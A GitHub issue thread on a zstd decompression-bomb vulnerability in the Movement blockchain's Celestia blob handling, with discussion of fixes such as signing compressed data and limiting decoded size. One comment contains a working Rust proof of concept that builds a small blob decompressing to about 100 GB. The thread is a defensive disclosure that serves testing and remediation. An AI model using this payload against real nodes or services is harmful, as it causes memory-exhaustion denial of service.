### ISSUE TITLE
(OTS) Zstd Bomb Blob

### ISSUE THREAD

**Issue by l-monninger** [movementlabsxyz/movement#876]
# Summary
A malicious user may post a zstd bomb (a small compressed blob which decompresses to a huge buffer) as a blob on the movement Celestia namespace. Even though blob data is checked to be signed, zstd decompression happens before the signature checks. This is done with the [zstd::decode_all(blob.data)](https://github.com/movementlabsxyz/movement/blob/0fe8c12c7fd2bf2d0b39ce5356e4ae539886099e/protocol-units/da/m1/util/src/ir_blob.rs#L171) function, which has no limits on the decompressed size of the blob. Even with Celestia’s 2 MB blob size limit, we were able to produce a PoC that uses approximately 100 GB of RAM on decompression.

**Comment by l-monninger** [comment]
@khokho

**Comment by l-monninger** [comment]
> Should we impose some constant size limit on IR blobs, or should it be a chain parameter?

Yes, but we also want to change the order of operations s.t. we are checking signatures on compressed blobs. That way we know honest signers are involved or not. 

Even with a supposed limit on IR blobs, we can still get bombed. But, later on, we can perhaps entertaining slashing signers that bomb. 

Ideally, we would also want to just have a way to catch bombing behavior and ignore said blob.

**Comment by l-monninger** [comment]
@khokho, can you share over your bomb s.t. we can write tests against it.

**Comment by khokho** [comment]
@l-monninger Here's the PoC:
```
fn zstd_bomb() {
    // MAGIC + header with max window size
    let mut b: Vec<u8> = vec![0x28, 0xb5, 0x2f, 0xfd, 0x0, 0x7f];
    let n_blocks = 0x530000;
    for _ in 0..n_blocks {
        // RLE block encoding 0xff byte repeated 0x8000 times
        b.extend(&[0x02, 0x00, 0x10, 0xff]);
    }
    // Block to finish the data
    b.extend(&[0x01, 0x00, 0x00]);
    // Check that we fit in celestia limits
    assert!(b.len() < 0x1_500_000);
    // decode the bomb
    // uses up at lest 100GB on my machine after which it crashes
    let res = zstd::decode_all(b.as_slice()).unwrap();
    dbg!(res.len());
}
```

**Comment by mzabaluev** [comment]
To me it boils down to two approaches:

1. Change the format so that the compression layer does not get applied to the signature, and use the signature to sign/verify the compressed payload. Keep relying on Celestia's innate limit to limit the size of compressed blobs.
2. Impose a limit on the size of decoded blobs and pass it to the zstd decoder.

**Comment by l-monninger** [comment]
@mzabaluev Yeah, that's what I would say.

**Comment by mzabaluev** [comment]
We have the maximum block size parameter [in memseq configuration](https://github.com/movementlabsxyz/movement/blob/b5955081b920727a1cff58876df34927d159a542/protocol-units/sequencing/memseq/util/src/lib.rs#L23), but it's in the number of transactions.

1. Is this enough information to derive the upper bound on the size of an uncompressed blob?
2. This parameter governs the blobs that the node creates. Can we also apply it to blobs received from DA?

**Comment by l-monninger** [comment]
> We have the maximum block size parameter [in memseq configuration](https://github.com/movementlabsxyz/movement/blob/b5955081b920727a1cff58876df34927d159a542/protocol-units/sequencing/memseq/util/src/lib.rs#L23), but it's in the number of transactions.
> 
> 1. Is this enough information to derive the upper bound on the size of an uncompressed blob?
> 2. This parameter governs the blobs that the node creates. Can we also apply it to blobs received from DA?

We could assume some like [Celestia bytes](https://github.com/movementlabsxyz/movement/blob/b5955081b920727a1cff58876df34927d159a542/protocol-units/da/movement/celestia/light-node/src/v1/sequencer.rs#L182) $\times$ [Compression Ratio](https://github.com/facebook/zstd?tab=readme-ov-file#benchmarks) + $\mu$ is reasonable. I would suggest $\mu$ should be 1--allowing for a particularly well compressed blobs to make it through. 

Yes, we should be able to apply it with blobs received via `maxWindowSize()`.

**Comment by mzabaluev** [comment]
> We could assume some like [Celestia bytes](https://github.com/movementlabsxyz/movement/blob/b5955081b920727a1cff58876df34927d159a542/protocol-units/da/movement/celestia/light-node/src/v1/sequencer.rs#L182) × [Compression Ratio](https://github.com/facebook/zstd?tab=readme-ov-file#benchmarks) + μ is reasonable.

I assume this really means `Celestia_Bytes × (Compression_Ratio + μ)`
The compression ratio is for a reference corpus, the real transaction blobs might have a different entropy, as they contain lots of uncompressible data like address hashes.

**Comment by mzabaluev** [comment]
By plugging zstd decompressing reader directly into the bcs decoder in streaming fashion, we can limit the allocation requirements to the 2 GB limit enforced internally [by bcs](https://github.com/zefchain/bcs/blob/1d03bda49fd006289352c0e022aee4d71945668b/src/de.rs#L285). No changes in format are required.

**Comment by mzabaluev** [comment]
> the 2 GB limit

This has to be multiplied by the number of byte array fields in the data structure, so it's 4 x 2 GiB. Combined with other memory use, this is pushing on operating budgets. So while the streaming fix defends against worst attacks, a proper solution would need the format change.

**Comment by mzabaluev** [comment]
> byte array fields

As we're realizing perhaps too late, three of these fields have no reason to be variable-length byte arrays, unless we want to designate the format of `signature`, `signer`, and `id` fields by their length, which would be a bad practice. So perhaps we should change the intermediate blob format and deal with upgrading.

**Comment by l-monninger** [comment]
Currently, we still have the ability to change the DA on all of our networks, so I would just make this change.

**Comment by mzabaluev** [comment]
After discussion with @l-monninger, the data blob size limit of 2 GiB, while manageable on most machines that are expected to run a DA light node, still allows submitting blobs that would cause intolerable latency when decompressed and decoded.
So we'll need a configurable container size limit in the bcs decoder.

**Comment by khokho** [comment]
Hello, I checked out the bug fix and it looks good. I also reviewed the BCS changes, and it’s great that they’re optional and shouldn’t affect existing code.

**Comment by mzabaluev** [comment]
Last touches are needed, submitted in #1013.
